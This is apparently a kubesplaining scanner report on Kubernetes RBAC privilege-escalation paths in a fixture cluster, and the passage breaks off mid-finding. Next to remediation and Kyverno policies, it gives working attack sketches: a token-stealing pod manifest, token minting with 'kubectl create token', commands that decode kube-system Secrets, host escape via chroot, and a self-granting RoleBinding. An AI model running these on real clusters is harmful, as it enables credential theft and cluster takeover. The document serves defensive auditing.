Impact Compromise of ServiceAccount/vulnerable/privileged-reader yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/vulnerable/default ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/vulnerable/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  4. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker runs chroot /host bash and is now root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-reader → ServiceAccount/vulnerable/default
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount vulnerable/default
  2. Step 2 of 2 Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/vulnerable/default
    Permission granted hostPID,hostIPC
    Gives the attacker runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-reader → ServiceAccount/vulnerable/default).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-reader → ServiceAccount/vulnerable/default).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
HIGH

Subjects can read kube-system Secrets in 1 hop(s)

KUBE-PRIVESC-PATH-KUBE-SYSTEM-SECRETS 3 subjects Score 8.6–8.1
MITRE ATT&CK: T1552.007 · T1078.004 · T1098

Affected subjects (3)

HIGH ServiceAccount/vulnerable/privileged-reader Namespace 8.6
ServiceAccount/vulnerable/privileged-reader can read kube-system Secrets in 1 hop(s)
Scope · Namespace Source ServiceAccount/vulnerable/privileged-reader → kube-system Secrets (control-plane namespace). Reads here typically yield credentials usable cluster-wide
Category: Data Exfiltration Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a privesc path that terminates in get/list/watch secrets in kube-system. This is not full cluster-admin, but it is the most consequential namespace to read. kube-system Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to cluster-admin (operator installers, helm-controllers).

The chain (1 hop(s); each step uses an explicit RBAC verb the engine validated):
1. ServiceAccount/vulnerable/privileged-reader/ via read_secrets (get,list secrets): can read secrets in kube-system or cluster-wide

In production clusters this path is the single most common one in kubesplaining's output. secrets:get is over-granted by Helm chart defaults, by stale view-style roles, and by ConfigMap-reader roles that wildcard resources to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.

Impact Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs. In practice, this is a one-way ratchet to full cluster control through subsequent privesc paths.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload mounting ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker reads ServiceAccount tokens out of the cluster's Secrets store (get,list secrets) and uses one of those tokens (typically a control-plane controller's) to escalate. Read-access on Secrets is the most consequential single verb in Kubernetes RBAC because every other identity's credential lives in a Secret object somewhere.
  3. Final step: the attacker has get secrets -n kube-system. They list every Secret, decode each data value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.
  1. Secrets read access read_secrets

    get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

    From ServiceAccount/vulnerable/privileged-reader
    Permission granted get,list secrets
    Gives the attacker can read secrets in kube-system or cluster-wide
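The final step in practice (secret and key names are placeholders): enumerate what is there, then decode whatever looks like a credential.

    kubectl --token="$TOKEN" -n kube-system get secrets -o json \
      | jq -r '.items[] | "\(.metadata.name): \((.data // {}) | keys | join(", "))"'
    kubectl --token="$TOKEN" -n kube-system get secret <name> -o jsonpath='{.data.<key>}' | base64 -d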
Remediation
Eliminate the path by tightening secrets:get in kube-system to a narrow allowlist of system controllers, then break the chain at: remove the permission get,list secrets that enables the first hop (ServiceAccount/vulnerable/privileged-reader/).
  1. List who can get secrets -n kube-system: kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa> for every workload SA, and kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets to find broad grants.
  2. Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.
  3. Break the chain at: remove the permission get,list secrets that enables the first hop (ServiceAccount/vulnerable/privileged-reader).
  4. For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using resourceNames, not resources: [secrets] (a manifest sketch follows this list).
  5. Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting secrets verbs without resourceNames to non-system subjects.
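
A manifest sketch of the resourceNames scoping from step 4, assuming a hypothetical controller that only needs the single Secret named cloud-config (both names are illustrative):

kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: read-cloud-config-only        # hypothetical name
  namespace: kube-system
rules:
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["cloud-config"]   # the one Secret the controller actually needs
    verbs: ["get"]                    # no list/watch: those verbs cannot be constrained by resourceNames
EOF
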
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Namespace 8.1
ServiceAccount/rbac-fixtures/sa-pod-create can read kube-system Secrets in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-pod-create → kube-system Secrets (control-plane namespace). Reads here typically yield credentials usable cluster-wide
Category: Data Exfiltration Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a privesc path that terminates in get/list/watch secrets in kube-system. This is not full cluster-admin, but it is the most consequential namespace to read. kube-system Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to cluster-admin (operator installers, helm-controllers).

The chain (2 hop(s); each step uses an explicit RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/vulnerable/privileged-reader via pod_create_token_theft (create pods): can create pods that mount ServiceAccount vulnerable/privileged-reader
2. ServiceAccount/vulnerable/privileged-reader via read_secrets (get,list secrets): can read secrets in kube-system or cluster-wide

In production clusters this path is the single most common one in kubesplaining's output. secrets:get is over-granted by Helm chart defaults, by stale view-style roles, and by ConfigMap-reader roles that wildcard resources to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.

Impact Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs. In practice, this is a one-way ratchet to full cluster control through subsequent privesc paths.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload mounting ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/vulnerable/privileged-reader ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker reads ServiceAccount tokens out of the cluster's Secrets store (get,list secrets) and uses one of those tokens (typically a control-plane controller's) to escalate. Read-access on Secrets is the most consequential single verb in Kubernetes RBAC because every other identity's credential lives in a Secret object somewhere.
  4. Final step: the attacker has get secrets -n kube-system. They list every Secret, decode each data value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes (a pod-spec sketch follows this list).

    From ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/vulnerable/privileged-reader
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount vulnerable/privileged-reader
  2. Step 2 of 2 Secrets read access read_secrets

    get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

    From ServiceAccount/vulnerable/privileged-reader
    Permission granted get,list secrets
    Gives the attacker can read secrets in kube-system or cluster-wide
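
A hedged sketch of the token-theft pod from step 1, assuming the attacker holds create pods in the vulnerable namespace (pod name and image are illustrative):

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: sa-token-theft                     # hypothetical name
  namespace: vulnerable
spec:
  serviceAccountName: privileged-reader    # the ServiceAccount whose token is being lifted
  containers:
    - name: steal
      image: busybox
      # Print the mounted token so it can be read back out of the pod logs.
      command: ["sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/token; sleep 3600"]
EOF

# Collect the token and use it as a bearer credential.
kubectl logs -n vulnerable sa-token-theft
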
Remediation
Eliminate the path by tightening secrets:get in kube-system to a narrow allowlist of system controllers, then break the chain at: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/vulnerable/privileged-reader).
  1. List who can get secrets -n kube-system: kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa> for every workload SA, and kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets to find broad grants.
  2. Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.
  3. Break the chain at: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/vulnerable/privileged-reader).
  4. For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using resourceNames, not resources: [secrets].
  5. Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting secrets verbs without resourceNames to non-system subjects.
HIGH ServiceAccount/rbac-fixtures/sa-token-create Namespace 8.1
ServiceAccount/rbac-fixtures/sa-token-create can read kube-system Secrets in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-token-create → kube-system Secrets (control-plane namespace). Reads here typically yield credentials usable cluster-wide
Category: Data Exfiltration Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a privesc path that terminates in get/list/watch secrets in kube-system. This is not full cluster-admin, but it is the most consequential namespace to read. kube-system Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to cluster-admin (operator installers, helm-controllers).

The chain (2 hop(s); each step uses an explicit RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/vulnerable/privileged-reader via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount vulnerable/privileged-reader
2. ServiceAccount/vulnerable/privileged-reader via read_secrets (get,list secrets): can read secrets in kube-system or cluster-wide

In production clusters this path is the single most common one in kubesplaining's output. secrets:get is over-granted by Helm chart defaults, by stale view-style roles, and by ConfigMap-reader roles that wildcard resources to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.

Impact Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs. In practice, this is a one-way ratchet to full cluster control through subsequent privesc paths.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload mounting ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/vulnerable/privileged-reader. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker reads ServiceAccount tokens out of the cluster's Secrets store (get,list secrets) and uses one of those tokens (typically a control-plane controller's) to escalate. Read-access on Secrets is the most consequential single verb in Kubernetes RBAC because every other identity's credential lives in a Secret object somewhere.
  4. Final step: the attacker has get secrets -n kube-system. They list every Secret, decode each data value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs (a kubectl sketch follows this list).

    From ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/vulnerable/privileged-reader
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount vulnerable/privileged-reader
  2. Step 2 of 2 Secrets read access read_secrets

    get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

    From ServiceAccount/vulnerable/privileged-reader
    Permission granted get,list secrets
    Gives the attacker can read secrets in kube-system or cluster-wide
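
A kubectl sketch of the TokenRequest route from step 1; kubectl create token calls the serviceaccounts/token subresource directly:

# Acting as the subject that holds create on serviceaccounts/token, mint a
# short-lived token for the target ServiceAccount; no pod required.
kubectl create token privileged-reader -n vulnerable --duration=10m

# The printed JWT is immediately usable as a bearer token, e.g.:
kubectl --token="$(kubectl create token privileged-reader -n vulnerable)" \
  get secrets -n kube-system
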
Remediation
Eliminate the path by tightening secrets:get in kube-system to a narrow allowlist of system controllers, then break the chain at: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/vulnerable/privileged-reader).
  1. List who can get secrets -n kube-system: kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa> for every workload SA, and kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets to find broad grants.
  2. Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.
  3. Break the chain at: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/vulnerable/privileged-reader).
  4. For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using resourceNames, not resources: [secrets].
  5. Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting secrets verbs without resourceNames to non-system subjects.
HIGH

Subjects can reach namespace-admin in `rbac-ns-fixtures` in 1 hop(s)

KUBE-PRIVESC-PATH-NAMESPACE-ADMIN 4 subjects Score 7.6–7.1
MITRE ATT&CK: T1078.004 · T1098 · T1068

Affected subjects (4)

HIGH ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Namespace 7.6
ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate can reach namespace-admin in `rbac-ns-fixtures` in 1 hop(s)
Scope · Namespace Source ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".
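
As an illustration of the primitive this chain abuses, a hedged sketch of the self-granting RoleBinding a subject with create rolebindings in rbac-ns-fixtures could apply (the binding name is illustrative):

kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: innocuous-maintenance-binding     # hypothetical, deliberately bland name
  namespace: rbac-ns-fixtures
subjects:
  - kind: ServiceAccount
    name: sa-ns-rolebinding-mutate
    namespace: rbac-ns-fixtures
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: admin                             # namespace-admin inside rbac-ns-fixtures only
EOF
# RBAC's escalation-prevention check still applies: the request succeeds when the
# creator already holds the referenced permissions or the bind verb; those are
# exactly the primitives this finding class flags.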

Impact Compromise of ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  3. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 1 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:rbac-ns-fixtures:sa-ns-rolebinding-mutate (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 1 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist (a Kyverno sketch follows this list).
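
A hedged sketch of the admission guardrail from step 5 as a Kyverno ClusterPolicy (policy name and exact field layout are illustrative; adjust to your Kyverno version and allowlist):

kubectl apply -f - <<'EOF'
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-privileged-rolebindings   # hypothetical name
spec:
  validationFailureAction: Enforce
  background: false
  rules:
    - name: block-admin-rolerefs
      match:
        any:
          - resources:
              kinds: ["RoleBinding"]
              namespaces: ["rbac-ns-fixtures"]
      validate:
        message: "RoleBindings in rbac-ns-fixtures may not reference cluster-admin or admin."
        deny:
          conditions:
            any:
              - key: "{{ request.object.roleRef.name }}"
                operator: AnyIn
                value: ["cluster-admin", "admin"]
EOF
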
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Namespace 7.1
ServiceAccount/rbac-fixtures/sa-pod-create can reach namespace-admin in `rbac-ns-fixtures` in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-pod-create → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
2. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-pod-create (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  4. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
  2. Step 2 of 2 RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

